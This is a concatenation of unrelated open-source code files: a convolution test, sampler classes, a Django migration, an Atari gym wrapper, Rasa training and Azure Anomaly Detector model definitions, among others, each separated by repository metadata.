gradweight_OK = False
gradinput_OK = False
if b not in ('valid', 'full'):
fwd_OK = False
gradweight_OK = False
gradinput_OK = False
if (not provide_shape) and (s != (1, 1)) and (b == 'full'):
gradweight_OK = False
gradinput_OK = False
if ((s[0] not in (1, 2)) or (s[1] not in (1, 2))) and (b == 'full'):
gradweight_OK = False
gradinput_OK = False
if fwd_OK:
self.run_fwd(inputs_shape=i, filters_shape=f, subsample=s,
verify_grad=True, mode=mode, device='cpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
else:
self.assertRaises(NotImplementedError,
self.run_fwd,
inputs_shape=i,
filters_shape=f,
subsample=s,
verify_grad=False,
mode=mode,
device='cpu',
provide_shape=provide_shape,
border_mode=b,
filter_flip=flip)
if gradweight_OK:
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=False, mode=mode, device='cpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
else:
self.assertRaises(NotImplementedError,
self.run_gradweight,
inputs_shape=i,
filters_shape=f,
output_shape=o,
subsample=s,
verify_grad=False,
mode=mode,
device='cpu',
provide_shape=provide_shape,
border_mode=b,
filter_flip=flip)
if gradinput_OK:
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=False, mode=mode, device='cpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
else:
self.assertRaises(NotImplementedError,
self.run_gradinput,
inputs_shape=i,
filters_shape=f,
output_shape=o,
subsample=s,
verify_grad=False,
mode=mode,
device='cpu',
provide_shape=provide_shape,
border_mode=b,
filter_flip=flip)
| 2.03125 | 2 |
config.py | eranroz/4suDRB-seq | 1 | 12786259 | # place to download and get, UCSC metadata.
KNOWN_GENES = 'meta_data/clustersWithNames.tsv'
# the data itself - directory of mat files (matlab) with convention REPLICATE_CONDITION_TIME.mat
# where:
# REPLICATE is some unique value (such as 384)
# CONDITION is some short description of condition (such as control)
# TIME is duration we collect the cells (relative to time we washed out the DRB)
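# e.g. a file named 384_control_15.mat would be replicate 384, condition "control",
# collected at time 15 (the time value here is only illustrative)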
TRANSCRIPTION_DATA_DIR = 'mat/'
# where to write the output to
HMM_RESULT_DIR = 'hmm_raw_res/'
ALL_REPLICATES = [] # replicates (OPTIONAL - if you sue the script without specifying replicate)
# ======= OTHER CONFIGURATIONS
MIN_GENE_LENGTH = 35000 # minimum length of genes to take into account. (short genes will be ignored)
jump = 50 # jumps of bins in the matlab array/resolution
min_sequence_length = 500 / jump # minimum sequence length after removing exons. shorter transcripts will be skipped
| 1.796875 | 2 |
randopt/samplers.py | seba-1511/randopt | 115 | 12786260 | <gh_stars>100-1000
#!/usr/bin/env python
import random
import math
from . import RANDOPT_RNG
"""
Here we implement the sampling strategies.
"""
class Sampler(object):
"""
Base class for all samplers.
Note: This class should not be directly instanciated.
"""
def __init__(self, *args, **kwargs):
self.rng = random.Random()
RANDOPT_RNG.random() # Change initial random state
self.rng.setstate(RANDOPT_RNG.getstate())
def sample(self):
raise NotImplementedError('sample() has not been implemented.')
def seed(self, seed_val):
self.rng.seed(seed_val)
def get_state(self):
return self.rng.getstate()
def set_state(self, state):
self.rng.setstate(state)
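# A minimal usage sketch of the concrete samplers defined below (illustrative only):
#
#     sampler = Gaussian(mean=0.0, std=1.0)
#     sampler.seed(1234)       # optional, makes sampling reproducible
#     value = sampler.sample()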
class Constant(Sampler):
def __init__(self, value):
super(Constant, self).__init__()
self.value = value
def sample(self):
return self.value
class Choice(Sampler):
"""
Samples a value from a given list according to the provided sampler.
Parameters:
    * items - (list) items to be sampled.
* sampler - (Sampler) Sampler used to select an item based on its index.
Return type: n/a
Example:
        randopt.Choice([0.01, 0.1, 1.0])
"""
def __init__(self, items, sampler=None):
"""sampler is any of the available samplers,
used to sample element's index from the list."""
if sampler is None:
sampler = Uniform()
self.sampler = sampler
self.items = items
self.rng = self.sampler.rng
def sample(self):
i = self.sampler.sample() * len(self.items)
i = int(math.floor(i))
return self.items[i]
class Truncated(Sampler):
"""
Given a sampler, clips the distribution between low and high.
If None, not truncated.
Parameters:
* sampler - (Sampler) Sampler to be truncated.
* low - (float) minimum value to be sampled. Default: None
* high - (float) maximum value to be sampled. Default: None
Return type: n/a
Example:
sampler = Gaussian(0.0, 0.1)
truncated = Truncated(sampler, -0.1, 0.1)
"""
def __init__(self, sampler=None, low=None, high=None):
if sampler is None:
sampler = Uniform()
self.sampler = sampler
self.min = low
self.max = high
self.rng = self.sampler.rng
def sample(self):
val = self.sampler.sample()
if self.min is not None and val < self.min:
val = self.min
if self.max is not None and val > self.max:
val = self.max
return val
class Uniform(Sampler):
'''
Generates a randomly sampled value from low to high with equal probability.
Parameters:
* low - (float) minimum value.
* high - (float) maximum value.
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.Uniform(low=-1.0, high=1.0, dtype='float')
'''
def __init__(self, low=0.0, high=1.0, dtype='float'):
super(Uniform, self).__init__()
self.low = low
self.high = high
self.dtype = dtype
def sample(self):
res = self.rng.uniform(self.low, self.high)
if 'fl' in self.dtype:
return res
return int(res)
class Gaussian(Sampler):
'''
Generates a randomly sampled value with specified mean and std based on a Gaussian distribution.
Parameters:
* mean - (float) mean of Gaussian. Default: 0.0
* std - (float) standard deviation of Gaussian. Default: 1.0
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.Gaussian(mean=0.0, std=1.0, dtype='float')
'''
def __init__(self, mean=0.0, std=1.0, dtype='float'):
super(Gaussian, self).__init__()
self.mean = mean
self.std = std
self.dtype = dtype
def sample(self):
res = self.rng.gauss(self.mean, self.std)
if 'fl' in self.dtype:
return res
return int(res)
class Normal(Gaussian):
pass
class LognormVariate(Sampler):
'''
Generates a randomly sampled value with specified mean and std based on a Log normal distribution.
Parameters:
* mean - (float) mean of Lognormal. Default: 0.0
* std - (float) standard deviation of Lognormal. Default: 1.0
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.LognormVariate(mean=0.0, std=1.0, dtype='float')
'''
def __init__(self, mean=0.0, std=1.0, dtype='float'):
super(LognormVariate, self).__init__()
self.mean = mean
self.std = std
self.dtype = dtype
def sample(self):
res = self.rng.lognormvariate(self.mean, self.std)
if 'fl' in self.dtype:
return res
return int(res)
class BetaVariate(Sampler):
'''
Generates a randomly sampled value with specified mean and std based on a Beta distribution.
Parameters:
* alpha - (float) alpha of beta distribution.
* beta - (float) beta of beta distribution.
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.BetaVariate(alpha=1,beta=1,dtype='float')
'''
def __init__(self, alpha, beta, dtype='float'):
super(BetaVariate, self).__init__()
self.alpha = alpha
self.beta = beta
self.dtype = dtype
def sample(self):
res = self.rng.betavariate(self.alpha, self.beta)
if 'fl' in self.dtype:
return res
return int(res)
class ExpoVariate(Sampler):
'''
Generates a randomly sampled value with lambda based on an exponential distribution.
Parameters:
* lam - (float) lambda of exponential distribution (one divided by desired mean).
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.ExpoVariate(lam=1, dtype='float')
'''
def __init__(self, lam, dtype='float'):
super(ExpoVariate, self).__init__()
self.lam = lam
self.dtype = dtype
def sample(self):
res = self.rng.expovariate(self.lam)
if 'fl' in self.dtype:
return res
return int(res)
class WeibullVariate(Sampler):
'''
Generates a randomly sampled value with specified mean and std based on a Weibull distribution.
Parameters:
* alpha - (float) alpha of Weibull distribution (scale parameter).
* beta - (float) beta of Weibull distribution (shape parameter).
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.WeibullVariate(alpha=1,beta=1,dtype='float')
'''
def __init__(self, alpha, beta, dtype='float'):
super(WeibullVariate, self).__init__()
self.alpha = alpha
self.beta = beta
self.dtype = dtype
def sample(self):
res = self.rng.weibullvariate(self.alpha, self.beta)
if 'fl' in self.dtype:
return res
return int(res)
class ParetoVariate(Sampler):
'''
Generates a randomly sampled value with alpha based on the Pareto distribution.
Parameters:
* alpha - (float) alpha of Pareto distribution (shape parameter).
* dtype - (string) data type. Default: float
Return type: n/a
Example:
randopt.ParetoVariate(alpha=1,dtype='float')
'''
def __init__(self, alpha, dtype='float'):
super(ParetoVariate, self).__init__()
self.alpha = alpha
self.dtype = dtype
def sample(self):
res = self.rng.paretovariate(self.alpha)
if 'fl' in self.dtype:
return res
return int(res)
| 3.65625 | 4 |
Myblog/config/migrations/0002_auto_20180418_2143.py | Family-TreeSY/MyBlog | 5 | 12786261 | <filename>Myblog/config/migrations/0002_auto_20180418_2143.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-04-18 13:43
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('config', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='sidebar',
name='display_type',
field=models.PositiveIntegerField(choices=[(1, 'HTML'), (2, '\u6700\u65b0\u6587\u7ae0'), (3, '\u6700\u70ed\u6587\u7ae0'), (4, '\u6700\u8fd1\u8bc4\u8bba')], default=1, verbose_name='\u5c55\u793a\u7c7b\u578b'),
),
]
| 1.523438 | 2 |
methods/Faster RCNN/remove_no_annotations.py | IvanNik17/Seasonal-Changes-in-Thermal-Surveillance-Imaging | 2 | 12786262 | <reponame>IvanNik17/Seasonal-Changes-in-Thermal-Surveillance-Imaging
import shutil
import os
from xml.dom.minidom import parse
labels_folder = './data/harborfront/test/Apr/outputs/'
labels = os.listdir(labels_folder)
for l in labels:
dom = parse(os.path.join(labels_folder, l))
# Get Document Element Object
data = dom.documentElement
# Get objects
objects = data.getElementsByTagName('object')
if len(objects) <=0 :
shutil.move(os.path.join(labels_folder, l), os.path.join(labels_folder, 'empty' + l)) | 2.515625 | 3 |
tests/test_aaindex1.py | shoz/ProtLearn | 1 | 12786263 | import os
import sys
path = os.environ.get('TRAVIS_BUILD_DIR')
sys.path.insert(0, path+'/protlearn')
import numpy as np
from preprocessing import txt_to_df
from feature_engineering import aaindex1
def test_aaindex1():
"Test AAIndex1"
# load data
df = txt_to_df(path+'/tests/docs/test_seq.txt', 0)
# get aaindex1
aaind1 = aaindex1(df)
# test shape
assert aaind1.shape == (4, 553)
# test some indices
ANDN920101 = np.array([4.3, 4.40555, 4.48714, 4.46])
QIAN880126 = np.array([.01166, -.17111, .05857, -.04333])
KARS160122 = np.array([2.014, 5.48522, 2.789, 1.751])
np.testing.assert_equal(np.round(aaind1['ANDN920101'], 3),\
np.round(ANDN920101, 3))
np.testing.assert_equal(np.round(aaind1['QIAN880126'], 3),\
np.round(QIAN880126, 3))
np.testing.assert_equal(np.round(aaind1['KARS160122'], 3),\
np.round(KARS160122, 3))
# test standardization (zscore)
aaind1_z = aaindex1(df, 'zscore')
# test mean = 0
for i in range(aaind1_z.shape[0]):
        assert abs(round(aaind1_z.iloc[:,i].mean())) == 0
# test std --> 1
for i in range(aaind1_z.shape[0]):
assert round(aaind1_z.iloc[:,i].std(), 1) ==\
round(aaind1_z.iloc[:,0].std(), 1)
# test standardization (minmax)
aaind1_mm = aaindex1(df, 'minmax')
# test minimum and maximum
for i in range(aaind1_mm.shape[0]):
assert round(aaind1_mm.iloc[:,i].min()) == 0
assert round(aaind1_mm.iloc[:,i].max()) == 1 | 2.234375 | 2 |
deep_rl/updated_atari_env/updated_atari_env.py | alexcoda/DeepRL | 1 | 12786264 | <reponame>alexcoda/DeepRL
from ale_python_interface import ALEInterface
from gym import error
from gym import spaces
from gym import utils
from gym.envs.atari import AtariEnv
from gym.utils import seeding
import numpy as np
import os
def to_ram(ale):
ram_size = ale.getRAMSize()
ram = np.zeros((ram_size),dtype=np.uint8)
ale.getRAM(ram)
return ram
class UpdatedAtariEnv(AtariEnv):
def __init__(self, rom_path, obs_type, frameskip=(2,5), repeat_action_probability=0., mode=0, difficulty=0):
"""Frameskip should be either a tuple (indicating a random range to
        choose from, with the top value excluded), or an int."""
utils.EzPickle.__init__(self, rom_path, obs_type)
assert obs_type in ('ram', 'image')
self.rom_path = rom_path
if not os.path.exists(self.rom_path):
            raise IOError('You asked for ROM %s but path %s does not exist' % (rom_path, self.rom_path))
self._obs_type = obs_type
self.frameskip = frameskip
# Load new ALE interface, instead of atari-py
self.ale = ALEInterface()
self.viewer = None
# Tune (or disable) ALE's action repeat:
# https://github.com/openai/gym/issues/349
assert isinstance(repeat_action_probability, (float, int)), "Invalid repeat_action_probability: {!r}".format(repeat_action_probability)
self.ale.setFloat('repeat_action_probability'.encode('utf-8'), repeat_action_probability)
self.seed()
# Set mode and difficulty
self.ale.setMode(mode)
self.ale.setDifficulty(difficulty)
self._action_set = self.ale.getMinimalActionSet()
self.action_space = spaces.Discrete(len(self._action_set))
(screen_width,screen_height) = self.ale.getScreenDims()
if self._obs_type == 'ram':
self.observation_space = spaces.Box(low=0, high=255, shape=(128,))
elif self._obs_type == 'image':
self.observation_space = spaces.Box(low=0, high=255, shape=(screen_height, screen_width, 3))
else:
raise error.Error('Unrecognized observation type: {}'.format(self._obs_type))
def seed(self, seed=None):
self.np_random, seed1 = seeding.np_random(seed)
# Derive a random seed. This gets passed as a uint, but gets
# checked as an int elsewhere, so we need to keep it below
# 2**31.
seed2 = seeding.hash_seed(seed1 + 1) % 2**31
# Empirically, we need to seed before loading the ROM.
self.ale.setInt(b'random_seed', seed2)
# Load game from ROM instead of game path
self.ale.loadROM(str.encode(self.rom_path))
return [seed1, seed2]
def _get_image(self):
return self.ale.getScreenRGB()
ACTION_MEANING = {
0 : "NOOP",
1 : "FIRE",
2 : "UP",
3 : "RIGHT",
4 : "LEFT",
5 : "DOWN",
6 : "UPRIGHT",
7 : "UPLEFT",
8 : "DOWNRIGHT",
9 : "DOWNLEFT",
10 : "UPFIRE",
11 : "RIGHTFIRE",
12 : "LEFTFIRE",
13 : "DOWNFIRE",
14 : "UPRIGHTFIRE",
15 : "UPLEFTFIRE",
16 : "DOWNRIGHTFIRE",
17 : "DOWNLEFTFIRE",
}
| 2.515625 | 3 |
grbl/connection.py | pylover/easymove | 0 | 12786265 | import serial
from .proxy import ObjectProxy
class Connection:
current_connection = None
_settings = None
_serial = None
def __init__(self, filename, baudrate=115200, **kw):
self.filename = filename
self.baudrate = baudrate
self.kw = kw
@property
def settings(self):
if self._settings is None:
from .configuration import Settings
self._settings = Settings(self)
return self._settings
def __enter__(self):
self._serial = serial.Serial(self.filename, self.baudrate, **self.kw)
self.__class__.current_connection = self
def __exit__(self, exc_type, exc_value, traceback):
self._serial.close()
self.__class__.current_connection = None
def send(self, data):
self._serial.write(data.encode())
def readlines(self):
data = self._serial.read(10)
connection = ObjectProxy(lambda: Connection.current_connection)
| 2.578125 | 3 |
12_funciones_listas_ej.py | jrg-sln/basic_python | 0 | 12786266 | <filename>12_funciones_listas_ej.py
# -*- coding: utf-8 -*-
############## Exercise on functions with lists #######################
'''Now that you know how to work with list functions, write a program
that simulates registering students in a list and finally prints it
in descending order'''
def alta(c, a):
c.append(a)
return c
def baja(c, b):
del[c[b]]
return c
def main():
alumnos = ["Marco", "Ricardo", "Gladys"]
print "\t\t\t\tBase de datos\nLa base actual es la suiguiente:\n", alumnos
a = "Pepe"
alumnos = alta(alumnos, a)
alumnos = baja(alumnos, alumnos.index('Marco'))
print "\nAhora la base es: "
for i in alumnos:
print i
if __name__ == '__main__':
main()
| 4.09375 | 4 |
project/pad/forms.py | lucrae/pad | 1 | 12786267 | from django import forms
class EntryForm(forms.Form):
body = forms.CharField() | 1.6875 | 2 |
elif_bayindir/phase_1/python_basic_1/day_4/q2.py | CodedLadiesInnovateTech/-python-challenge-solutions | 6 | 12786268 | <gh_stars>1-10
# Question 2
# Count number 4 in a list
list1 = [1, 2, 10, 4, 3, 4, 4, 4, 1, 3, 5]
x = 0
for i in range(len(list1)):
if list1[i] == 4:
x += 1
print("Number of 4 in the list:", x)
| 3.53125 | 4 |
ipbes-ndr/src/ipbes_ndr_analysis/__main__.py | richpsharp/ipbes-analysis | 1 | 12786269 | import os
import sys
import logging
import ipbes_ndr_analysis
LOGGER = logging.getLogger(__name__)
if __name__ == '__main__':
if len(sys.argv) != 3:
LOGGER.error(
"usage: python %s iam_token_path workspace_dir", sys.argv[0])
sys.exit(-1)
raw_iam_token_path = sys.argv[1]
raw_workspace_dir = sys.argv[2]
if not os.path.isfile(raw_iam_token_path):
LOGGER.error(
            '%s is not a file, should be an iam token', raw_iam_token_path)
sys.exit(-1)
if os.path.isfile(raw_workspace_dir):
LOGGER.error(
'%s is supposed to be the workspace directory but points to an '
'existing file' % raw_workspace_dir)
sys.exit(-1)
ipbes_ndr_analysis.main(raw_iam_token_path, raw_workspace_dir)
| 2.5625 | 3 |
pangea/core/views/__init__.py | LongTailBio/pangea-django | 0 | 12786270 | <reponame>LongTailBio/pangea-django
from .s3_views import (
S3ApiKeyCreateView,
S3ApiKeyDetailsView,
S3BucketCreateView,
S3BucketDetailsView,
)
from .user_views import (
PangeaUserListView,
PangeaUserDetailsView,
get_user_detail_by_djoser_id,
get_current_user_detail,
)
from .organization_views import (
OrganizationCreateView,
OrganizationUsersView,
OrganizationDetailsView,
)
from .project_views import (
ProjectCreateView,
ProjectDetailsView,
ProjectSampleGroupsView,
)
from .sample_group_views import (
SampleGroupCreateView,
SampleGroupDetailsView,
SampleGroupSamplesView,
get_sample_links_in_group,
get_sample_metadata_in_group,
get_sample_ar_counts_in_group,
get_sample_group_manifest,
get_sample_data_in_group,
generate_sample_metadata_schema,
validate_sample_metadata_schema,
)
from .sample_views import (
SampleCreateView,
SampleDetailsView,
bulk_create_samples,
get_sample_manifest,
get_sample_metadata,
)
from .analysis_result_views import (
SampleAnalysisResultCreateView,
SampleAnalysisResultDetailsView,
SampleGroupAnalysisResultCreateView,
SampleGroupAnalysisResultDetailsView,
SampleAnalysisResultFieldCreateView,
SampleAnalysisResultFieldDetailsView,
SampleGroupAnalysisResultFieldCreateView,
SampleGroupAnalysisResultFieldDetailsView,
post_sample_ar_upload_url,
post_sample_ar_complete_multipart_upload_url,
post_sample_group_ar_upload_url,
post_sample_group_ar_complete_multipart_upload_url,
)
from .pipeline_views import (
PipelineCreateView,
PipelineDetailsView,
PipelineModuleCreateView,
PipelineModuleDetailsView,
PipelineNameDetailsView,
get_module_in_pipeline,
)
from .work_order_views import (
WorkOrderProtoListView,
GroupWorkOrderProtoListView,
WorkOrderProtoRetrieveView,
GroupWorkOrderProtoRetrieveView,
JobOrderProtoListView,
JobOrderProtoRetrieveView,
WorkOrderRetrieveView,
GroupWorkOrderRetrieveView,
JobOrderDetailView,
create_new_work_order,
create_new_group_work_order,
SampleWorkOrdersView,
WorkOrderProtoWorkOrderView,
SampleGroupGroupWorkOrdersView,
GroupWorkOrderProtoWorkOrderView,
) | 1.5 | 2 |
core/train_dm.py | botfront/rasa-for-botfront-old | 1 | 12786271 | import argparse
import glob
import os
import time
import logging
from rasa_addons.domains_merger import DomainsMerger
from rasa_addons.superagent import SuperAgent
from rasa_core.policies.memoization import MemoizationPolicy, AugmentedMemoizationPolicy
from rasa_core.policies.keras_policy import KerasPolicy
from rasa_core.agent import Agent
logger = logging.getLogger()
def concatenate_storyfiles(folder_path, prefix='stories', output='aggregated_stories.md'):
path_pattern = u'{}/{}*.md'.format(folder_path, prefix)
filenames = glob.glob(path_pattern)
with open(output, 'w') as outfile:
for fname in filenames:
with open(fname, 'r') as infile:
for line in infile:
outfile.write(line)
outfile.write("\n")
def train(stories_path, domain_path, policy_path):
root = os.path.dirname(__file__)
domain_path = os.path.join(root, domain_path)
stories_path = os.path.join(root, stories_path)
# generate_questions_data(stories_path, domain_path)
concatenate_storyfiles(stories_path, 'stories', os.path.join(stories_path, 'aggregated_stories.md'))
training_data_file = os.path.join(stories_path, 'aggregated_stories.md')
DomainsMerger(domain_path).merge().dump()
domain_path = os.path.join(domain_path, 'aggregated_domains.yaml')
from rasa_core.featurizers import (MaxHistoryTrackerFeaturizer,
BinarySingleStateFeaturizer)
policies = [
MemoizationPolicy( max_history=3),
KerasPolicy(MaxHistoryTrackerFeaturizer(BinarySingleStateFeaturizer(), max_history=3))
]
agent = SuperAgent(domain_path, policies=policies)
training_data = agent.load_data(training_data_file)
agent.train(training_data, epochs=200, validation_split=0.0)
agent.persist(policy_path)
logging.basicConfig(level="WARN")
def create_argparser():
parser = argparse.ArgumentParser(
description='Trains the bot.')
parser.add_argument('-s', '--stories', help="Stories path")
parser.add_argument('-d', '--domain', help="Domain path")
parser.add_argument('-p', '--policy', help="Policy path")
return parser
if __name__ == "__main__":
debug_mode = True
parser = create_argparser()
args = parser.parse_args()
start_time = time.time()
train(args.stories, args.domain, args.policy)
print("--- %s seconds ---" % (time.time() - start_time))
| 2.046875 | 2 |
sdk/anomalydetector/azure-ai-anomalydetector/azure/ai/anomalydetector/models/_models.py | rsdoherty/azure-sdk-for-python | 2,728 | 12786272 | <filename>sdk/anomalydetector/azure-ai-anomalydetector/azure/ai/anomalydetector/models/_models.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class AlignPolicy(msrest.serialization.Model):
"""AlignPolicy.
:param align_mode: An optional field, indicates how we align different variables into the same
time-range which is required by the model.{Inner, Outer}. Possible values include: "Inner",
"Outer".
:type align_mode: str or ~azure.ai.anomalydetector.models.AlignMode
:param fill_na_method: An optional field, indicates how missed values will be filled with. Can
not be set to NotFill, when alignMode is Outer.{Previous, Subsequent, Linear, Zero, Fix,
NotFill}. Possible values include: "Previous", "Subsequent", "Linear", "Zero", "Pad",
"NotFill".
:type fill_na_method: str or ~azure.ai.anomalydetector.models.FillNAMethod
:param padding_value: optional field, only be useful if FillNAMethod is set to Pad.
:type padding_value: int
"""
_attribute_map = {
'align_mode': {'key': 'alignMode', 'type': 'str'},
'fill_na_method': {'key': 'fillNAMethod', 'type': 'str'},
'padding_value': {'key': 'paddingValue', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(AlignPolicy, self).__init__(**kwargs)
self.align_mode = kwargs.get('align_mode', None)
self.fill_na_method = kwargs.get('fill_na_method', None)
self.padding_value = kwargs.get('padding_value', None)
class AnomalyContributor(msrest.serialization.Model):
"""AnomalyContributor.
:param contribution_score: The higher the contribution score is, the more likely the variable
to be the root cause of a anomaly.
:type contribution_score: float
:param variable: Variable name of a contributor.
:type variable: str
"""
_validation = {
'contribution_score': {'maximum': 2, 'minimum': 0},
}
_attribute_map = {
'contribution_score': {'key': 'contributionScore', 'type': 'float'},
'variable': {'key': 'variable', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AnomalyContributor, self).__init__(**kwargs)
self.contribution_score = kwargs.get('contribution_score', None)
self.variable = kwargs.get('variable', None)
class AnomalyDetectorError(msrest.serialization.Model):
"""Error information returned by the API.
:param code: The error code. Possible values include: "InvalidCustomInterval", "BadArgument",
"InvalidGranularity", "InvalidPeriod", "InvalidModelArgument", "InvalidSeries",
"InvalidJsonFormat", "RequiredGranularity", "RequiredSeries".
:type code: str or ~azure.ai.anomalydetector.models.AnomalyDetectorErrorCodes
:param message: A message explaining the error reported by the service.
:type message: str
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AnomalyDetectorError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class AnomalyState(msrest.serialization.Model):
"""AnomalyState.
All required parameters must be populated in order to send to Azure.
:param timestamp: Required. timestamp.
:type timestamp: ~datetime.datetime
:param value:
:type value: ~azure.ai.anomalydetector.models.AnomalyValue
:param errors: Error message when inference this timestamp.
:type errors: list[~azure.ai.anomalydetector.models.ErrorResponse]
"""
_validation = {
'timestamp': {'required': True},
}
_attribute_map = {
'timestamp': {'key': 'timestamp', 'type': 'iso-8601'},
'value': {'key': 'value', 'type': 'AnomalyValue'},
'errors': {'key': 'errors', 'type': '[ErrorResponse]'},
}
def __init__(
self,
**kwargs
):
super(AnomalyState, self).__init__(**kwargs)
self.timestamp = kwargs['timestamp']
self.value = kwargs.get('value', None)
self.errors = kwargs.get('errors', None)
class AnomalyValue(msrest.serialization.Model):
"""AnomalyValue.
All required parameters must be populated in order to send to Azure.
:param contributors: If current timestamp is an anomaly, contributors will show potential root
cause for thus anomaly. Contributors can help us understand why current timestamp has been
detected as an anomaly.
:type contributors: list[~azure.ai.anomalydetector.models.AnomalyContributor]
:param is_anomaly: Required. To indicate whether current timestamp is anomaly or not.
:type is_anomaly: bool
    :param severity: Required. Severity score of the current timestamp; the more significant the
     anomaly, the higher the score.
:type severity: float
    :param score: Anomaly score of the current timestamp; the more significant the anomaly, the
     higher the score. Score measures the global significance.
:type score: float
"""
_validation = {
'is_anomaly': {'required': True},
'severity': {'required': True, 'maximum': 1, 'minimum': 0},
'score': {'maximum': 2, 'minimum': 0},
}
_attribute_map = {
'contributors': {'key': 'contributors', 'type': '[AnomalyContributor]'},
'is_anomaly': {'key': 'isAnomaly', 'type': 'bool'},
'severity': {'key': 'severity', 'type': 'float'},
'score': {'key': 'score', 'type': 'float'},
}
def __init__(
self,
**kwargs
):
super(AnomalyValue, self).__init__(**kwargs)
self.contributors = kwargs.get('contributors', None)
self.is_anomaly = kwargs['is_anomaly']
self.severity = kwargs['severity']
self.score = kwargs.get('score', None)
class ChangePointDetectRequest(msrest.serialization.Model):
"""ChangePointDetectRequest.
All required parameters must be populated in order to send to Azure.
:param series: Required. Time series data points. Points should be sorted by timestamp in
ascending order to match the change point detection result.
:type series: list[~azure.ai.anomalydetector.models.TimeSeriesPoint]
:param granularity: Required. Can only be one of yearly, monthly, weekly, daily, hourly,
     minutely or secondly. Granularity is used to verify whether the input series is valid. Possible
values include: "yearly", "monthly", "weekly", "daily", "hourly", "minutely", "secondly",
"microsecond", "none".
:type granularity: str or ~azure.ai.anomalydetector.models.TimeGranularity
    :param custom_interval: Custom Interval is used to set a non-standard time interval. For
     example, if the series is sampled every 5 minutes, the request can be set as
     {"granularity":"minutely", "customInterval":5}.
:type custom_interval: int
    :param period: Optional argument; the periodic value of a time series. If the value is null or
     not present, the API determines the period automatically.
:type period: int
    :param stable_trend_window: Optional argument, advanced model parameter; if not set, a default
     stableTrendWindow is used in detection.
:type stable_trend_window: int
    :param threshold: Optional argument, advanced model parameter, between 0.0 and 1.0; the lower
     the value, the larger the trend error, which means fewer change points will be accepted.
:type threshold: float
"""
_validation = {
'series': {'required': True},
'granularity': {'required': True},
}
_attribute_map = {
'series': {'key': 'series', 'type': '[TimeSeriesPoint]'},
'granularity': {'key': 'granularity', 'type': 'str'},
'custom_interval': {'key': 'customInterval', 'type': 'int'},
'period': {'key': 'period', 'type': 'int'},
'stable_trend_window': {'key': 'stableTrendWindow', 'type': 'int'},
'threshold': {'key': 'threshold', 'type': 'float'},
}
def __init__(
self,
**kwargs
):
super(ChangePointDetectRequest, self).__init__(**kwargs)
self.series = kwargs['series']
self.granularity = kwargs['granularity']
self.custom_interval = kwargs.get('custom_interval', None)
self.period = kwargs.get('period', None)
self.stable_trend_window = kwargs.get('stable_trend_window', None)
self.threshold = kwargs.get('threshold', None)
class ChangePointDetectResponse(msrest.serialization.Model):
"""ChangePointDetectResponse.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar period: Frequency extracted from the series, zero means no recurrent pattern has been
found.
:vartype period: int
    :param is_change_point: isChangePoint contains change point properties for each input point.
     True means a change point has been detected. The index of the array is consistent with the
     input series.
:type is_change_point: list[bool]
:param confidence_scores: the change point confidence of each point.
:type confidence_scores: list[float]
"""
_validation = {
'period': {'readonly': True},
}
_attribute_map = {
'period': {'key': 'period', 'type': 'int'},
'is_change_point': {'key': 'isChangePoint', 'type': '[bool]'},
'confidence_scores': {'key': 'confidenceScores', 'type': '[float]'},
}
def __init__(
self,
**kwargs
):
super(ChangePointDetectResponse, self).__init__(**kwargs)
self.period = None
self.is_change_point = kwargs.get('is_change_point', None)
self.confidence_scores = kwargs.get('confidence_scores', None)
class DetectionRequest(msrest.serialization.Model):
"""Request to submit a detection.
All required parameters must be populated in order to send to Azure.
    :param source: Required. Source file link of the input variables. Each variable is a CSV file
     with two columns, where the first column is the timestamp and the second column is the value.
     Besides these variable CSV files, an extra meta.json can be included in the zip file if you
     would like to rename a variable. By default, the file name of the variable is used as the
     variable name. The variables used in detection should be consistent with the variables in the
     model used for detection.
:type source: str
    :param start_time: Required. The start time of the data used for detection, formatted as
     date-time.
:type start_time: ~datetime.datetime
    :param end_time: Required. The end time of the data used for detection, formatted as
     date-time.
:type end_time: ~datetime.datetime
"""
_validation = {
'source': {'required': True},
'start_time': {'required': True},
'end_time': {'required': True},
}
_attribute_map = {
'source': {'key': 'source', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(DetectionRequest, self).__init__(**kwargs)
self.source = kwargs['source']
self.start_time = kwargs['start_time']
self.end_time = kwargs['end_time']
class DetectionResult(msrest.serialization.Model):
"""Anomaly Response of one detection corresponds to a resultId.
All required parameters must be populated in order to send to Azure.
:param result_id: Required.
:type result_id: str
:param summary: Required. Multivariate anomaly detection status.
:type summary: ~azure.ai.anomalydetector.models.DetectionResultSummary
:param results: Required. anomaly status of each timestamp.
:type results: list[~azure.ai.anomalydetector.models.AnomalyState]
"""
_validation = {
'result_id': {'required': True},
'summary': {'required': True},
'results': {'required': True},
}
_attribute_map = {
'result_id': {'key': 'resultId', 'type': 'str'},
'summary': {'key': 'summary', 'type': 'DetectionResultSummary'},
